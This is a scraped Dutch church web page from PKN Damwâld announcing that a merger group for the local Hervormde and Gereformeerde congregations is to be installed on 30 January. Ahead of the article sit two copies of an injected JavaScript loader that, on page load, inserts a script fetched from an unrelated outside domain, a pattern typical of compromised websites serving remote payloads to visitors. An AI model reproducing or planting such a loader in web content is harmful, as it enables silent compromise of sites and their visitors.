;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “Samen op weg” gaat nu richting fusie … de fusiegroep gaat van start! - PKN Damwâld

“Samen op weg” gaat nu richting fusie … de fusiegroep gaat van start!

Gepubliceerd op: maandag 23 januari

“It giet oan”, zei de voorzitter van de Friesche Elfsteden toen de laatste Elfstedentocht werd aangekondigd en nu hier in Damwâld gaat het ook gebeuren. Een officiële stap richting een fusie van de Hervormde Gemeente en de Gereformeerde Kerk in Damwâld per 1 januari 2025. Daarom hebben de gezamenlijke kerkenraden een aantal leden uit beide gemeentes gevraagd om de formele handelingen voor te bereiden en alle stappen in beeld te brengen voor de totstandkoming van de Protestantse Gemeente Damwâld. Deze zogeheten fusiegroep  wordt op 30 januari officieel geïnstalleerd.

“We slaan nu echt de handen ineen en gaan verkennen hoe we samen kerk willen zijn”. Er is al heel veel gebeurd in de afgelopen tijd en veel zaken zijn al besproken, maar er staat ook nog behoorlijk wat werk te wachten. Het doel van de fusiegroep is om zo snel als mogelijk alle aandachtsgebieden goed in beeld te hebben, zodat gestart kan worden met de daadwerkelijke fusie.
Uiteraard worden de gemeenteleden op de hoogte gehouden van de ontwikkelingen en de voortgang. Als er tussendoor vragen of onduidelijkheden zijn, is het belangrijk dat u zo snel mogelijk aan de bel trekt. Dat mag bij uw eigen kerkenraad of bij de leden van de stuurgroep.